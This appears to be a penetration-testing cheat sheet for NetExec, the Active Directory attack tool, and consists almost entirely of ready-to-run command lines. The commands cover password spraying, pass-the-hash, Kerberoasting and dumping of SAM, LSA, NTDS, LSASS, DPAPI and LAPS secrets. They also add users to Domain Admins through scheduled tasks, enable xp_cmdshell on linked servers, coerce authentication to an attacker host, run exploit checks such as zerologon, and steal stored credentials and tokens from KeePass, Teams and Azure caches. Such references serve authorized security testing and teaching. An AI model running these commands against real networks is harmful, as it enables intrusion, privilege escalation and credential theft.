POSTS

NetExec

Swiss-army knife for Active Directory and network protocol enumeration/exploitation, successor to CrackMapExec.

NetExec
3151 words · 15 min

Setup

  • Dependencies

    • Python 3
    • Rust (curl –proto ‘=https’ –tlsv1.2 -sSf https://sh.rustup.rs | sh)
    • Python arc4 dependency (pip install arc4 OR sudo apt policy python3-arc4 #on kali)
  • Installation

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

netexec --version
  • Update
pipx upgrade netexec        # Will update if there is a new version

Basic usage

netexec <protocol> <target> -u <user> -p <password>
nxc <protocol> <target> -u <user> -p <password>

# example over SMB
netexec smb <target> -u <user> -p <password>

Supported protocols include smb, ldap, mssql, ssh, ftp, winrm, rdp, wmi, nfs, vnc, and more.

Every protocol accepts the same target syntax, and formats can be combined in a single command:

netexec <protocol> dc01.domain.local        # hostname
netexec <protocol> 192.168.1.10 10.0.0.5    # one or more IPs
netexec <protocol> 192.168.1.0/24           # CIDR
netexec <protocol> 192.168.1.10-20          # range
netexec <protocol> targets.txt              # file with one target per line

Authentication

# Null session
netexec smb <target> -u '' -p ''

# Guest
netexec smb <target> -u 'guest' -p ''

# Local account (not domain)
netexec smb <target> -u <user> -p <password> --local-auth

# Pass-the-hash (LM:NTLM or NTLM only)
netexec smb <target> -u <user> -H <NT_HASH>
netexec smb <target> -u <user> -H <LM_HASH>:<NT_HASH>

# Kerberos (password or cached ticket) required `export KRB5CCNAME=~/ticket.ccache`
netexec smb <target> -u <user> -p <password> -k
netexec ldap <target> --use-kcache

# Credential/user lists (see Password spraying below for bulk auth)
netexec smb <target> -u users.txt -p passwords.txt
netexec smb <target> -u users.txt -H hashes.txt

Using modules

# List available modules for a protocol
netexec smb -L

# View a module's options
netexec smb -M lsassy --options

# Run a module
netexec smb <target> -u <user> -p <password> -M lsassy

# Pass module options (KEY=value, msfvenom style)
netexec smb <target> -u <user> -p <password> -M lsassy -o COMMAND=whoami

# Run several modules in one pass
netexec smb <target> -u <user> -p <password> -M spider_plus -M lsassy -M gpp_password

DNS options

nxc <protocol> <target> -u <user> -p <password> --dns-server <dns-server ip>
nxc <protocol> <target> -u <user> -p <password> --dns-timeout <seconds>
nxc <protocol> <target> -u <user> -p <password> --dns-tcp    # Use TCP for DNS
nxc <protocol> <target> -u <user> -p <password> -6           # Enforce ipv6

Enumeration

# Basic host info (OS, hostname, domain, signing state)
netexec smb <target>

# Null session / guest logon check
netexec smb <target> -u '' -p ''
netexec smb <target> -u 'guest' -p ''

# Hosts with SMB signing disabled (relay candidates)
netexec smb <target> --gen-relay-list relay_targets.txt

# Domain users
netexec smb <target> -u '' -p '' --users
netexec smb <target> -u '' -p '' --users --users-export output.txt
netexec smb <target> -u '' -p '' --rid-brute

# Local Groups
netexec smb <target> -u <user> -p <password> --local-group

# Password spraying (one password against many users)
netexec smb <target> -u users.txt -p '<Password123>' --continue-on-success

# Credential list against user list (no bruteforce pairing)
netexec smb <target> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Throttle to avoid lockouts
netexec smb <target> -u users.txt -p '<Password123>' --continue-on-success --delay 5

# Logged-On Users with the Remote Registry Service
netexec smb <target> -u <user> -p <password> --reg-sessions
netexec smb <target> -u <user> -p <password> --reg-sessions <username>
netexec smb <target> -u <user> -p <password> --reg-sessions './users.txt' # list of usernames

# Enumerate Shares and Access
netexec smb <target> -u <user> -p <password> --shares
netexec smb <target> -u <user> -p <password> --shares --shares READ,WRITE

# Enumerate Network Interfaces
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --interfaces

# Enumerate the LmCompatibilityLevel (NTLMv1) on the remote target via the remote registry:
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> -M ntlmv1

# Enumerate Disks
netexec smb <target> -u <user> -p <password> --disks

# Enumerate Domain Password Policy
netexec smb <target> -u <user> -p <password> --pass-pol
# Enumerate users/groups anonymously
netexec ldap <target> -u '' -p '' --users
netexec ldap <target> -u '' -p '' --groups

# Enumerate just the active users
netexec ldap <target> -u <user> -p <password> --active-users

# Get User Descriptions (options: FILTER, PASSWORDPOLICY, MINLENGTH)
netexec ldap <target> -u <user> -p <password> -M get-desc-users

# Export all users
netexec ldap <target> -u <user> -p <password> --users-export output.txt

# Enumerate all members in specific group
netexec ldap <target> -u <user> -p <password> --groups "Domain Admins"

# Dump PSO (Fine-Grained Password Policies (FGPPs) or Password Settings Objects (PSOs))
netexec ldap <target> -u <user> -p <password> --pso

# enumerate the `scriptPath` attribute of Active Directory users (options: FILTER, OUTPUTFILE)
netexec ldap <target> -u <user> -p <password> -M get-scriptpath

SMB

# Everything at once
netexec smb <target> -u <user> -p <password> --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

# Pull a remote file
netexec smb <target> -u <user> -p <password> --share <share> --get-file <remote_path> <local_path>

# Push a local file to a share
netexec smb <target> -u <user> -p <password> --share <share> --put-file <local_path> <remote_path>

# Crawl every readable/writable share for interesting files
netexec smb <target> -u <user> -p <password> -M spider_plus
netexec smb <target> -u <user> -p <password> -M spider_plus -o DOWNLOAD_FLAG=true EXTENSIONS=xlsx,docx,pdf

# Execute a command / PowerShell
netexec smb <target> -u <user> -p <password> -x whoami
netexec smb <target> -u <user> -p <password> -X 'Get-Process'

# Logged-On Users with the Workstation Service 
# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --loggedon-users
netexec smb <target> -u <user> -p <password> --loggedon-users <username>

# Windows interactive sessions (needed to know who can be impersonated, see schtask_as below)
netexec smb <target> -u <user> -p <password> --qwinsta
netexec smb <target> -u <user> -p <password> --qwinsta <username>

# Execute a command as another logged-on user (needs local admin)
netexec smb <target> -u <user> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command> 
## example
netexec smb <target> -u <user> -p <password> --local-auth -M schtask_as -o USER=[target] CMD="whoami" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"
netexec smb <target> -u <user> -p <password> --local-auth -M schtask_as -o USER=[target] CMD="powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"" TASK="Windows Update Service" FILE="update.log" LOCATION="\\Windows\\Tasks\\"

# Change a user's password / add or remove to a group
netexec smb <target> -u <user> -p <password> -M change-password -o NEWPASS=<new_pass>
netexec smb <target> -u <user> -p <password> -M change-password -o NEWNTHASH=31d6cfe0d16ae931b73c59d7e0c089c0
netexec smb <target> -u <user> -p <password> -M change-password -o USER=<target_user> NEWPASS=<new_pass>
netexec smb <target> -u <user> -p <password> -M change-password -o USER=<target_user> NEWNTHASH=<new_nthash>
netexec smb <target> -u <user> -p <password> -M adduser -o USER=<target_user> GROUP='Domain Admins'
netexec smb <target> -u <user> -p <password> -M modify-group -o USER=<target_user> GROUP=<target_group> REMOVE=True

# Generate a hosts file, krb5.conf, or a TGT for Kerberos auth
netexec smb <target> -u <user> -p <password> --generate-hosts-file /etc/hosts
netexec smb <target> -u <user> -p <password> --generate-krb5-file /etc/krb5.conf
netexec smb <target> -u <user> -p <password> --generate-tgt <basename>

# Enumerate remote processes
netexec smb <target> -u <user> -p <password> --tasklist
netexec smb <target> -u <user> -p <password> --tasklist keepass.exe

# Killing remote processes
netexec smb <target> -u <user> -p <password> --taskkill PID
netexec smb <target> -u <user> -p <password> --taskkill --taskkill process_name.exe

LDAP

# Common AD misconfig sweep
netexec ldap <target> -u <user> -p <password> --trusted-for-delegation --password-not-required --admin-count --users --groups

# Kerberoasting / AS-REP roasting
netexec ldap <target> -u <user> -p <password> --kerberoasting hashes.txt
netexec ldap <target> -u <user> -p <password> --kerberoasting hashes.txt --targeted-kerberoast <user1> <user2>   # or  <users.list>
netexec ldap <target> -u <user> -p <password> --asreproast hashes.txt

# BloodHound collection
netexec ldap <target> -u <user> -p <password> --bloodhound --dns-server <dc_ip> --dns-tcp -c all

# Raw LDAP queries (alternative to ldapsearch)
netexec ldap <target> -u <user> -p <password> -q "(objectClass=user)" -a sAMAccountName

# LDAP signing/channel binding requirements
netexec ldap <target> -u <user> -p <password> -M ldap-checker                 # REMOVED: Checking for signing and channel binding is now done on the host enumeration, see host banner

# ADCS, MachineAccountQuota, pre-created computer accounts, delegation etc
netexec ldap <target> -u <user> -p <password> -M adcs                         # List All PKI Enrollment Servers
netexec ldap <target> -u <user> -p <password> -M adcs -o SERVER=<CA>          # List All Certificates Inside a PKI
netexec ldap <target> -u <user> -p <password> -M maq                          # Get the Machine Account Quota
netexec ldap <target> -u <user> -p <password> -M pre2k                        # Pre2k Computer Account Abuse
netexec ldap <target> -u <user> -p <password> --find-delegation               # Misconfigured Delegation
netexec ldap <target> -u <user> -p <password> --trusted-for-delegation        # Unconstrained Delegation
netexec ldap <target> -u <user> -p <password> --admin-count                   # Get all user objects with the adminCount attribute set to 1

# Domain SID, DC list, and trusts
netexec ldap <target> -u <user> -p <password> --get-sid
netexec ldap <target> -u <user> -p <password> -M dc-list
netexec ldap <target> -u <user> -p <password> --dc-list                       # Enumerate DC including Domain Trusts
netexec ldap <target> -u <user> -p <password> -M enum_trusts                  # # REMOVED: Moved to `--dc-list` argument

# Read DACL Rights
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET=Administrator ACTION=read                      # Read all the ACEs of the Administrator
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=Obak3      # Read all the rights the Obak3 user has on the Administrator
netexec ldap <target> -u <user> -p <password> --kdcHost <domain_controller> -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync # Read all the principals that have DCSync rights on the domain

# Query LDAP _(alternative to ldapsearch)_
netexec ldap <target> -u <user> -p <password> --query "(sAMAccountName=Administrator)" ""
netexec ldap <target> -u <user> -p <password> --query "(sAMAccountName=Administrator)" "sAMAccountName objectClass pwdLastSet"

# Entra ID
netexec ldap <target> -u <user> -p <password> -M entra-id

MSSQL / SSH / FTP

# MSSQL auth + command execution via xp_cmdshell
netexec mssql <target> -u <user> -p <password>                                                      # Including Encryption settings and Channel Binding configuration
netexec mssql <target> -d <domain> -u <user> -p <password>                                          # For Windows Auth, if SMB port close, add the flag `-d <domain>`
netexec mssql <target> -u <user> -p <password> --local-auth
netexec mssql <target> -u <user> -p <password> -M mssql_priv -o ACTION=privesc                      # Impersonating
netexec mssql <target> -u <user> -p <password> -M mssql_priv                                        # Check after `mssql_priv` Module
netexec mssql <target> -u <user> -p <password> -M mssql_priv -o ACTION=rollback                     # Rollback sysadmin privs in production
netexec mssql <target> -u <user> -p <password> -x whoami
netexec mssql <target> -u <user> -p <password> -q 'SELECT name FROM sys.databases'                  # List databases
netexec mssql <target> -u <user> -p <password> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
netexec mssql <target> -u <user> -p <password> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt  # Upload a file
netexec mssql <target> -u <user> -p <password> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file   # Download a file
netexec mssql <target> -u <user> -p <password> -M enum_links                                        # Find Linked Servers
netexec mssql <target> -u <user> -p <password> -M exec_on_link -o LINKED_SERVER=<MSSQL_LINKED_SERVER> COMMAND='select @@servername'  # Execute MSSQL Queries on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_enable_cmdshell -o LINKED_SERVER=<MSSQL_LINKED_SERVER> ACTION=enable          # Enable xp_cmdshell on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_xpcmd -o LINKED_SERVER=<MSSQL_LINKED_SERVER> CMD='whoami'                     # Command Execution on a Linked Server
netexec mssql <target> -u <user> -p <password> -M link_enable_cmdshell -o LINKED_SERVER=<MSSQL_LINKED_SERVER> ACTION=disable          # Disable xp_cmdshell on a Linked Server

# SSH auth (password or key) + command execution
netexec ssh <target> -u <user> -p <password>
netexec ssh <target> -u <user> --key-file id_rsa
netexec ssh <target> -u <user> -p <password> -x "uname -a"
netexec ssh <target> -u <user> -p <password> --put-file file.txt /tmp/file.txt                      # Send a File to the Remote Target
netexec ssh <target> -u <user> -p <password> --get-file /tmp/file.txt file.txt                      # Get a File From the Remote Target

# FTP browsing and download
netexec ftp <target> -u <user> -p <password> --ls
netexec ftp <target> -u <user> -p <password> --ls <folder> 
netexec ftp <target> -u <user> -p <password> --get <file>
netexec ftp <target> -u <user> -p <password> --put <local-file> <remote-path>

Other protocols

# WinRM auth + command execution
netexec winrm <target> -u <user> -p <password>
netexec winrm <target> -u <user> -p <password> --laps     # If LAPS is used inside the domain, use `--laps <username>` if default administrator name is not "administrator" 
netexec winrm <target> -u <user> -p <password> -x whoami
netexec winrm <target> -u <user> -p <password> --dpapi    # Dump Credential Manager secrets for the connecting user. No Admin privileges needed!

# WMI command execution
netexec wmi <target> -u <user> -p <password> -x whoami    # For Windows Auth, if SMB port close, add the flag `-d <domain>`
netexec wmi <target> -u <user> -p <password> --local-auth

# RDP: NLA check + screenshot
netexec rdp <target> -u <user> -p <password>
netexec rdp <target> -u <user> -p <password> --screenshot --screentime 10
netexec rdp <target> -u <user> -p <password> --nla-screenshot     # if NLA is disabled
netexec rdp <target> -u <user> -p <password> -x whoami            # This functionality is still in beta testing and was added in 2025

# NFS: enumerate exports, list, and pull files
netexec nfs <target>
netexec nfs <target> --shares
netexec nfs <target> --share '/var/nfs/general' --ls '/'
netexec nfs <target> --get-file /home/user/Desktop/test/test.txt test.txt             # Download a file
netexec nfs <target> --put-file test2.txt /home/user/Desktop/                         # Upload a file, with chmod 777 permissions by default (this can be changed with `--chmod`)

# VNC auth + screenshot
netexec vnc <target> -p <password>
netexec vnc <target> -p <password> --screenshot
netexec vnc <target> -p <password> --screenshot --screentime <seconds>

Credential dumping

# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> --sam
netexec smb <target> -u <user> -p <password> --lsa # Requires Domain Admin or Local Admin Priviledges on target Domain Controller
netexec smb <target> -u <user> -p <password> --ntds
netexec smb <target> -u <user> -p <password> --ntds --enabled
netexec smb <target> -u <user> -p <password> --ntds vss
netexec smb <target> -u <user> -p <password> --ntds --user <username>
netexec smb <target> -u <user> -p <password> --dpapi
netexec smb <target> -u <user> -p <password> --laps
netexec smb <target> -u <user> -p <password> -M lsassy
netexec smb <target> -u <user> -p <password> -M nanodump

# gMSA passwords
netexec ldap <target> -u <user> -p <password> --gmsa

# Group Policy Preferences leftover creds
netexec smb <target> -u <user> -p <password> -M gpp_password

# Chain several dumping flags/modules in one pass
netexec smb <target> -u <user> -p <password> --sam --lsa --dpapi

Vulnerability checks

netexec smb <target> -u '' -p '' -M zerologon
netexec smb <target> -u <user> -p <password> -M nopac            # needs valid creds
netexec smb <target> -u '' -p '' -M printnightmare
netexec smb <target> -u '' -p '' -M smbghost
netexec smb <target> -u '' -p '' -M ms17-010
netexec smb <target> -u <user> -p <password> -M ntlm_reflection  # CVE-2025-33073, needs valid creds

# Coercion checks (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce)
netexec smb <target> -u '' -p '' -M coerce_plus
netexec smb <target> -u '' -p '' -M coerce_plus -o LISTENER=<attacker_ip>
netexec smb <target> -u '' -p '' -M coerce_plus -o LISTENER=<attacker_ip> METHOD=petitpotam
netexec smb <target> -u '' -p '' -M coerce_plus -o L=<attacker_ip> M=p

# Run several checks at once
netexec smb <target> -u <user> -p <password> -M zerologon -M printnightmare -M nopac

SCCM

# Enumerate Primary Site Server and Distribution Point via recon6
netexec smb <target> -u <user> -p <password> -M sccm-recon6

# Enumerate SCCM
netexec ldap <target> -u <user> -p <password> -M sccm -o REC_RESOLVE=TRUE

# Dump SCCM
# _(Requires Domain Admin or Local Admin Priviledges on target Domain Controller)_
netexec smb <target> -u <user> -p <password> --sccm
netexec smb <target> -u <user> -p <password> --sccm --sccm disk
netexec smb <target> -u <user> -p <password> --sccm --sccm wmi

Useful modules

# _(You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account)_
netexec smb <target> -u <user> -p <password> -M bitlocker            # Enumerate Bitlocker
netexec smb <target> -u <user> -p <password> -M webdav               # WebClient service check (PetitPotam prereq)
netexec smb <target> -u <user> -p <password> -M spooler              # Spooler service check (PrinterSpooler prereq)
netexec smb <target> -u <user> -p <password> -M veeam                # Dump creds from local Veeam SQL DB
netexec smb <target> -u <user> -p <password> -M enum_av              # Enumerate installed AV/EDR
netexec smb <target> -u <user> -p <password> -M reg -o KEY=<registry_path>  # Read a registry key
netexec smb <target> -u <user> -p <password> -M keepass_discover
netexec smb <target> -u <user> -p <password> -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
netexec smb <target> -u <user> -p <password> -M winscp
netexec smb <target> -u <user> -p <password> -M wifi                 # Get the WIFI password register in Windows
netexec smb <target> -u <user> -p <password> -M teams_localdb        # Dump Microsoft Teams cookies
netexec smb <target> -u <user> -p <password> -M backup_operator      # don't need to local admin privilege on the remote target if you are in SeBackupPrivilege
netexec smb <target> -u <user> -p <password> -M wam                  # Dump access token for Azure and Microsoft 365 from Token Broker Cache
netexec smb <target> -u <user> -p <password> -M wam --mkfile masterkeys.txt
netexec smb <target> -u <user> -p <password> -M wam --pvk domain_backup_key.pvk
netexec smb <target> -u <user> -p <password> -M putty                # Dump private Keys stored for authentication or stored proxy credentials
netexec smb <target> -u <user> -p <password> -M vnc                  # RealVNC or TightVNC
netexec smb <target> -u <user> -p <password> -M mremoteng            # Dump mRemoteNG stored credentials
netexec smb <target> -u <user> -p <password> -M notepad              # Dump unsaved Notepad documents finding credentials
netexec smb <target> -u <user> -p <password> -M notepad++            # Dump unsaved Notepad++ documents finding credentials
netexec smb <target> -u <user> -p <password> -M rdcman               # Dump Remote Desktop Connection Manager credentials
netexec smb <target> -u <user> -p <password> -M eventlog_creds       # Parse Windows Event ID 4688 and Sysmon Logs
netexec smb <target> -u <user> -p <password> -M rclone               # Dumps credentials from unencrypted Rclone config files
netexec smb <target> -u <user> -p <password> -M security-questions   # Dump a local user's security questions if set
netexec smb <target> -u <user> -p <password> -M dns-nonsecure        # Get DNS zones configured with `Nonsecure and secure` setting for dynamic updates. This misconfiguration allows unauthenticated users to add DNS records.

Logging & database

# Log the current command's output to a file
netexec smb <target> -u <user> -p <password> --log run.log

NetExec stores every credential and result it sees in a per-protocol SQLite database under ~/.nxc/workspaces. Use the nxcdb shell to browse or export it:

nxcdb
nxcdb (default) > workspace create <engagement_name>
nxcdb (<engagement_name>) > proto smb
nxcdb (<engagement_name>)(smb) > creds
nxcdb (<engagement_name>)(smb) > export shares detailed shares.csv

Notes

  • -M <module> loads a NetExec module; -o KEY=VALUE passes module-specific options; -L lists all available modules for a protocol.
  • Most modules need valid domain creds (or a hash) — start with null/guest auth to find low-hanging fruit before spraying.
  • Add --dns-server <ip>, --dns-tcp, or -6 when the target isn’t resolvable through your default resolver.
  • Full module list and options: netexec.wiki